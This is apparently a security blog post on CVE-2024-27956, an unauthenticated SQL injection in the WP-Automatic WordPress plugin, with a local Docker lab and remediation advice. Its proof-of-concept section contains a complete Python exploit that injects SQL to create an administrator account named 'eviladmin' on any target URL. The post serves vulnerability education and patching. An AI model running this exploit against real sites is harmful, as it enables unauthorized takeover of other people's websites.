CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)

2024-05-05
James McGill
CVE-2024-27956
CVE-2024-27956 exploit
CVE-2024-27956 PoC
WP-Automatic SQL injection
WordPress vulnerability
WP-Automatic exploit
Unauthenticated SQL injection
SQLi in WP-Automatic
WP-Automatic security flaw
Mitigating CVE-2024-27956
Secure Wordpress
Protecting WordPress from SQL injection
CVE-2024-27956: SQL Injection Vulnerability in ValvePress Automatic (WP-Automatic)

Introduction

CVE-2024-27956 refers to a critical SQL injection (SQLi) vulnerability discovered in the WP-Automatic plugin, a popular content automation tool for WordPress websites. This vulnerability allows unauthenticated attackers to execute arbitrary SQL queries on the affected website's database, potentially leading to complete website compromise.

Technical Details

The vulnerability resides within the user authentication mechanism of the WP-Automatic plugin. Specifically, it is reported to be present in one of the plugin's core files responsible for handling user login requests. The code suffers from improper sanitization of user-provided input, allowing attackers to inject malicious SQL code into the login process.

Attack Scenario

  • Crafting a Malicious Request: An attacker can craft a specially crafted login request containing malicious SQL code. This code could be designed to achieve various malicious goals, such as:

    • Creating new administrator accounts: By injecting SQL queries that manipulate the WordPress user table, attackers can create new user accounts with administrator privileges.

    • Stealing sensitive data: Malicious SQL queries can be used to extract sensitive information from the database, such as usernames, passwords (hashed or in plaintext depending on storage method), and website content.

    • Uploading web shells: Injected SQL can potentially grant attackers the ability to upload malicious files like web shells to the server, allowing for persistent remote access.

  • Exploiting the Vulnerability: When the crafted login request is submitted to the vulnerable plugin, the malicious SQL code bypasses the intended security measures and gets executed directly on the website's database server.

  • Gaining Control: Depending on the attacker's objectives, the injected SQL code can manipulate the database to grant them unauthorized access, steal sensitive data, or establish persistence on the compromised website.

Impact

A successful exploit of CVE-2024-27956 can have severe consequences for website owners, including:

  • Website Takeover: Attackers can gain complete control over the compromised website, allowing them to deface it, inject malicious content, or redirect visitors to phishing sites.

  • Data Theft: Sensitive user information, website content, and other confidential data can be stolen by attackers.

  • SEO Spam: Attackers might inject spam content into the website, negatively impacting its Search Engine Optimization (SEO) ranking.

  • Malware Distribution: The compromised website can be used as a platform to distribute malware to unsuspecting visitors.

Exploitation (Proof of Concept)

For proof of concept explanation, we first need to build a lab in our local environment hosting a wordpress instance with vulnerable version of WP Automatic Plugin installed and activated on it. We will use the following docker-compose to host our victim wordpress site on port 8080:

version: '3.1'
services:
  wordpress:
    image: wordpress
    restart: always
    ports:
      - 8080:80
    environment:
      WORDPRESS_DB_HOST: db
      WORDPRESS_DB_USER: exampleuser
      WORDPRESS_DB_PASSWORD: examplepass
      WORDPRESS_DB_NAME: exampledb
    volumes:
      - wordpress:/var/www/html
  db:
    image: mysql:8.0
    restart: always
    environment:
      MYSQL_DATABASE: exampledb
      MYSQL_USER: exampleuser
      MYSQL_PASSWORD: examplepass
      MYSQL_RANDOM_ROOT_PASSWORD: '1'
    volumes:
      - db:/var/lib/mysql
volumes:
  wordpress:
  db:          

Let's start the docker containers:

docker-compose up

We can access our wordpress site on http://localhost:8080 and complete the installation. At the moment, we have only one user in our wordpress user table which is our admin user with administrator's rights as seen here:


Now, let's the following vulnerable version of WP Automatic Plugin and activate it:

At this step, we have our target environment set up for this PoC. Let's use the following python script to exploit CVE-2024-27956 and create us a user with administrator rights to help takeover the site:

import requests
import sys

def makeRequest(payload, hash, url):
    host = url.split('/', 3)[2]
    headers = {
    'Host': host,
    'User-Agent': 'Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0',
    'Accept':
'text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8',
    'Accept-Language': 'en-US,en;q=0.5',
    'Accept-Encoding': 'gzip, deflate, br',
    'Content-type': 'application/x-www-form-urlencoded',
    'Connection': 'close',
    'Upgrade-Insecure-Requests': '1'
    }
    data = {
    'q': payload,
    'auth': b'\0',
    'integ': hash
    }
    response = requests.post(url, data=data, headers=headers)
    return response

def helpUsage():
    print("[+] You must run the expoit passing the wordpress URL. \n[+] Example: python
exploit.py http://website.com")
    quit()

def verifyArgs(argv):
    if len(sys.argv) != 2:
        helpUsage()

verifyArgs(sys.argv)
print("[+] Exploit for CVE-2024-27956")
domain = sys.argv[1]
url = domain+'/wp-content/plugins/wp-automatic/inc/csv.php'

#first request (create user)
print("[+] Creating user eviladmin")
response = makeRequest("INSERT INTO wp_users (user_login, user_pass, user_nicename,
user_email, user_url, user_registered, user_status, display_name) VALUES ('eviladmin',
'$P$BASbMqW0nlZRux/2IhCw7AdvoNI4VT0', 'eviladmin', 'eviladmin@gmail.com',
'http://127.0.0.1:8000', '2024-04-30 16:26:43', 0, 'eviladmin')",
"09956ea086b172d6cf8ac31de406c4c0", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in
response.text:
    print("[+] Error in the payload")
    quit()

if "DATE" not in response.text:
    print("[+] Not vulnerable")
    quit()

#second request (give permission)
print("[+] Giving eviladmin administrator permissions")
makeRequest("INSERT INTO wp_usermeta (user_id, meta_key, meta_value) VALUES
((SELECT ID FROM wp_users WHERE user_login = 'eviladmin'), 'wp_capabilities', 'a:1
{s:13:\"administrator\";s:1:\"1\";}')", "bd98494b41544b818fa9f583dadfa2bb", url)
if "Tampered query" in response.text or "invalid login" in response.text or "login required" in
response.text:
    print("[+] Error in the payload")
    quit()
print("[+] Exploit completed!")
print("[+] administrator created: eviladmin:admin")

The above script exploits CVE-2024-27956 to insert a malicious administrator user into the WordPress database, effectively gaining unauthorized access to the WordPress site. Here's the breakdown of its functionality:

  • The script prints information about the exploit and the target domain.

  • It constructs the target URL by appending /wp-content/plugins/wp-automatic/inc/csv.php to the provided domain.

  • It makes the first request to insert a malicious user into the WordPress database.

  • If the response indicates success, it proceeds to make a second request to give the inserted user administrator permissions.

  • If both requests are successful, it prints a message indicating the exploit is completed and that an administrator user eviladmin with password admin has been created.

Let's execute the script by providing our hosted wordpress site as the target address:

python3 exploit.py http://localhost:8080

Let's try to login to the admin panel using the newly created user by our exploit script.

We are able to successfully login to the admin panel of our target wordpress site and taken its full control by exploiting CVE-2024-27956. We can revisit the users page for confirmation of administrator rights being given to the user we just created.

Remediation

The developers of WP-Automatic have addressed this vulnerability in version 3.9.2.0. It is imperative to update the WP-Automatic plugin to this version or later as soon as possible. Additionally, website owners should consider the following measures:

  • Implement a Web Application Firewall (WAF): A WAF can help to detect and block malicious traffic, including attempts to exploit SQL injection vulnerabilities.

  • Maintain Strong Passwords: Enforce strong password policies for all WordPress user accounts, including administrator accounts.

  • Regular Security Audits: Conduct regular security audits to identify and address potential vulnerabilities on the website.

Conclusion

CVE-2024-27956 is a serious vulnerability that can be exploited by attackers to gain unauthorized access to websites using the WP-Automatic plugin. By promptly updating the plugin, implementing additional security measures, and maintaining good security hygiene, website owners can significantly reduce the risk of compromise.

Disclaimer

The information presented in this blog post is for educational purposes only. It is intended to raise awareness about the CVE-2024-27956 vulnerability and help mitigate the risks. It is not intended to be used for malicious purposes.

It's crucial to understand that messing around with vulnerabilities in live systems without permission is not just against the law, but it also comes with serious risks. This blog post does not support or encourage any activities that could help with such unauthorized actions.

CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure
CVE-2024-48914: Arbitrary File Read Vulnerability in Vendure
2024-10-26
Kamran Hasan
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
CVE-2022-44268: Arbitrary File Disclosure in ImageMagick
2024-05-26
James McGill
CVE-2021-43798: Path Traversal in Grafana
CVE-2021-43798: Path Traversal in Grafana
2024-03-30
James McGill
CVE-2021-3129: Remote Code Execution in Laravel
CVE-2021-3129: Remote Code Execution in Laravel
2024-02-14
James McGill
CVE-2024-28116: Server-Side Template Injection in Grav CMS
CVE-2024-28116: Server-Side Template Injection in Grav CMS
2024-03-24
James McGill
CVE-2022-42889: Remote Code Execution in Apache Commons Text
CVE-2022-42889: Remote Code Execution in Apache Commons Text
2024-01-13
James McGill